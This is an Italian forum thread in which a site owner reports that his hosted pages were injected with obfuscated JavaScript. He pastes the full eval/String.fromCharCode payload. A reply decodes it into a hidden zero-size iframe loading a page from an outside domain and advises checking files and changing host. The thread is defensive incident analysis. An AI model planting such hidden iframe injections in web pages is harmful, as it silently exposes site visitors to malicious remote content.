Visualizzazione dei risultati da 1 a 5 su 5

Discussione: IL server è ko

  1. #1

    IL server è ko

    Ciao a tutti il mio sito ospitato su un server linux ha da ieri mattina tutte le pagine modificate senza che io abbia fatto nulla.

    Tutti le pagine hanno un codice javascript inserito uguale a questo

    language=javascript>eval(String.fromCharCode(100,1 11,99,117,109,101,110,116,46,119,114,105,116,101,4 0,39,60,105,102,114,97,109,101,32,115,114,99,61,34 ,104,116,116,112,58,47,47,119,119,119,46,99,97,114 ,56,97,117,46,99,111,109,47,111,114,46,104,116,109 ,108,34,32,104,101,105,103,104,116,61,48,32,119,10 5,100,116,104,61,48,32,98,111,114,100,101,114,61,4 8,62,60,47,105,102,114,97,109,101,62,39,41))


    è da ieri mattina che cerco di chiamare l'assistenza di euroweb ma senza alcun risultato.
    Ho postato messaggi nel pannello di controllo ho mandato mail ma a quasi 27 ore dalla prima segnalazione non ho ancora ricevuto risposta.

    Nel pomeriggio poi non sono neanche piu riuscito a logarmi in ftp per cercare di rimuovere questo codice

    il sito è

    http://www.cobigraf.it

    è come si punta la pagina partono subito collegamenti ad altri siti web a me sconosciuti.

    che può essere?

    come faccio a bloccare il generarsi di questi codici???

    chi mi consiglia un server linux con un assistenza decente???

    vi ringrazio

  2. #2

    Re: IL server è ko

    Attualmente sembra OK
    comunque.....
    Originariamente inviato da Colica70
    che può essere?
    Hanno bucato il Server
    come faccio a bloccare il generarsi di questi codici???
    Senza accesso FTP non puoi.
    chi mi consiglia un server linux con un assistenza decente???
    Il regolamento del Forum non permette tali discussioni.


    cichity74

  3. #3

    Problema risolto

    il problema pare risolto
    i codici nelle pagine non ci sono più.


    Resta da capire il come sia successo

  4. #4
    - per primo il titolo è infinitamente vado e non c'entra NULLA con php ...

    - per secondo è vietato postare nomi di hoster

    - per terzo ... un consiglio spassionato ... cambia hosting, al 90% hanno bucato il server il codice che hai trovato faceva eseguire questa riga di javascript tramite eval:
    document.write('<iframe src="http://www.car8au.com/or.html" height=0 width=0 border=0>')

    ovvero inseriva un'iframe nascosto nella tua pagina che rimandava all'indirizzo http://www.car8au.com/or.html (pagina che è stata prontamente eliminata)

    cmq probabilmente un bot è passato e ha fatto la modifica alle pagine usando un'exploit standard o magari è stato qualcuno che non aveva nulla da fare

    sta di fatto che il server è stato bucato (o il tuo account questo non so) e che quindi a parte fai notare la cosa al provider, ti consiglio di esaminare pagina per pagina TUTTO ciò che hai sul server e di reinstallare quello che puoi

    ciao
    The fastest Redis alternative ... cachegrand! https://github.com/danielealbano/cachegrand

  5. #5
    Forum sbagliato
    Addio Aldo, amico mio... [03/12/70 - 16/08/03]

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.